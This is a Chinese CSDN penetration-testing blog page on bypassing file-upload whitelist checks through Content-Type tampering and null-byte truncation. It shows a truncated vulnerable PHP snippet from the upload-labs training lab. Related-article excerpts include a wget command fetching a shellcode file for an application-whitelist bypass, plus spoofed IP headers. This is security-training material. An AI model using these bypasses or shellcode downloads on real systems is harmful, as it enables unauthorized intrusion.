【漏洞挖掘】——78、白名单检测绕过

最新推荐文章于 2024-07-28 15:11:54 发布
最新推荐文章于 2024-07-28 15:11:54 发布
阅读量60 收藏
点赞数
分类专栏: 【WEB渗透】 文章标签: android 渗透测试 信息安全 网络安全 web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/139629722
版权
【WEB渗透】 专栏收录该内容
151 篇文章 11 订阅 ¥29.90 ¥99.00
订阅专栏
这篇博客探讨了在网络安全中的白名单检测机制,尤其是针对Content-Type和%00、0x00截断的绕过方法。通过分析代码和实例,详细介绍了如何在PHP环境下利用Content-Type篡改和%00、0x00截断来规避服务器的文件类型检查,从而成功上传恶意文件。
摘要由CSDN通过智能技术生成
检测机制

白名单检测顾名思义就是只允许上传白名单规定的后缀名文件

检测绕过
Content-Type
Content-Type

Content-Type检测属于白名单检测的一种,它会对上传文件请求包中Content-Type的内容进行校验,判断是否属于白名单,如果不属于则不允许上传

白名单检测代码

下面的代码取自upload-labs的Pass-02:

<?php
include '../config.php';
include '../head.php';
include '../menu.php';

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'];
了解本专栏 订阅专栏 解锁全文
FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
【愚公系列】2023年04月 文件上传渗透测试绕过白名单检查(Content-Type、%00截断、0x00截断、CVE-2015-2348)
时光隧道
08-22 5万+
文件上传漏洞是一种安全漏洞,指攻击者通过网站上传功能上传恶意文件来攻击网站的漏洞。攻击者可以通过利用这种漏洞上传恶意文件来执行代码和命令,进而控制网站、窃取敏感信息等。常见的文件上传漏洞主要存在于没有健全的文件上传验证机制的网站中。白名单检查是一种安全机制,用于限制只有列入特定名单中的人员、设备或程序才可以获得访问权限,而不允许其他未经授权的访问。这种机制通常用于保护敏感数据或系统不被未经授权的访问和攻击。在白名单检查中,只有列入白名单的实体允许通过验证,而不在白名单中的所有实体都被阻止访问相关资源。
web安全第六天:绕过白名单监测实现文件上传
cc777777777的博客
02-27 3356
web安全第六天:绕过白名单监测实现文件上传
ip白名单绕过
qq_34778376的博客
11-17 2115
ip白名单绕过方式 请求头绕过: X-Real-ip:xxxx x-forwarded-for:xxxx x-remote-IP:xxxx
网络安全】文件上传黑白名单及数组绕过技巧
最新发布
goldfish8848的博客
07-28 770
将客户端数据以文件形式封装,通过网络协议发送到服务器端,在服务器解析数据,最终在服务端硬盘上作为真实的文件保存。
一次白名单绕过分析
woshiyanfu的博客
09-15 216
好耶,成功收获老大赞赏,至于什么情况下用什么方法还得结合系统,以及程序员大哥留口饭吃,代码不要写太好,如果有什么问题欢迎指证具体程序代码如下,有兴趣的可以看看,感觉还是有意思的elsecontext.Response.Write(“{fileName:“不支持文件类型!”}”);return;if (!if (!if (!if (!if (!if (!
绕过应用程序白名单技巧
hl1293348082的专栏
03-28 1332
在内网渗透中,经常会在内网主机执行执行的渗透工具的时候出现执行不起来的情况,很多时候是由与安全软件做了白名单限制,只允许指定的白名单中的应用程序启动,这时我们就需要利用白名单中的程序做我们想做的事情,执行我们想要执行的程序,下面就给大家分享几个绕过白名单执行应用程序的姿势。 一、通过 csharp 编译文件绕过防病毒软件 1、下载 CSharp 文件 wget http://tinyurl.com/InstallUtil-ShellCode-cs 2、使用 msfvenom 生成一个 msf
深入浅出带你了解文件上传白名单绕过
qq_44005305的博客
01-02 2221
今天比较详细的讲了文件上传白名单绕过原理以及应用方法,可能刚开始学不太好理解。有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。# 学习计划安排我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉。
利用URL特性绕过域名白名单检测
热门推荐
CC's Blog
01-09 1万+
URL跳转漏洞主要是利用浏览器对URL特性的支持,绕过一些正则匹配不严谨的防护。
网安入门12-文件上传(黑白名单,00截断)
m0_61499194的博客
01-09 1750
比如发送的htp包里把文件名改成test.asp.或test.asp_(下划线为空格),这种命名方式在windows系统里是不被允许的,所以需要在burp之类里进行修改,然后绕过验证后,会被windows.系统自动去掉后面的点和空格,但要注意Unix/Linux系统没有这个特性。原因在于GET传参和POST传参不同,post数据的特点是我们把包发过去之后,服务器会进行URL二次编码,编码后的参数到了后端再解码执行,相当于传到服务器的是%25%30%30,到了后端还是%00。
信息安全技术:绕过白名单检测上传.pptx
11-01
以下我们将深入探讨一种常见绕过白名单检测的方法——0x00截断。 0x00截断,也称为NULL字节截断,是利用某些编程语言或系统对0x00(NULL)字符的特殊处理来绕过过滤机制。在示例中,服务器端的白名单检查文件...
PHP漏洞挖掘(二):PHP常见漏洞分析——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(二):PHP常见漏洞分析——课程资源百度网盘下载,亲测真实有效!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
PHP漏洞挖掘(六):PHP常见CMS的漏洞分析——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(六):PHP常见CMS的漏洞分析——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
国内SRC漏洞挖掘经验和技巧分享.pdf
09-10
白帽子是指那些致力于网络安全研究和漏洞挖掘的个人或团队。SRC个人推荐包括: 1. 合规手段:SRC个人推荐中,合规手段是非常重要的,包括使用合法的手段来获取信息,而不是使用非法的手段来获取信息。 2. 点到为止...
ApplicationWhitelistBypassTechniques:应用程序白名单绕过技术目录
07-14
应用程序白名单绕过技术是网络安全领域的一个重要话题,它涉及到如何保护系统免受恶意软件或未经授权的程序执行的攻击。白名单策略是一种安全措施,它只允许预定义的、被视为安全的应用程序运行,而阻止所有其他未知...
文件上传常用绕过方式
weixin_43077878的博客
04-02 2719
1.前端。
利用白名单应用绕过防护
Coisini的博客
06-13 1381
0x00 前言 看了subTee的在ShmooCon2015的PPT,学习到了很多关于应用白名单绕过的技巧,今天又看见了subTee开始写博客了,并且详细解释了关于应用白名单绕过的方法,于是结合自己测试与大家分享一下。 看完ppt其实作者是想告诉我们一种思想,我自己的理解是“利用信任程序执行恶意代码“。 0x01 脚本执行 当在一些情况下,比如限制了.bat|.vbs|.ps1脚本执行,我们可以...
WEB漏洞攻防 - 文件上传漏洞 - 白名单绕过处理方法
易编橙 · 终身成长社群,相遇已是上上签!
09-02 1万+
区别于黑名单验证,白名单绕过处理方法 采用后缀名的绕过方法 如`MIME修改、%00截断、0x00截断`
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值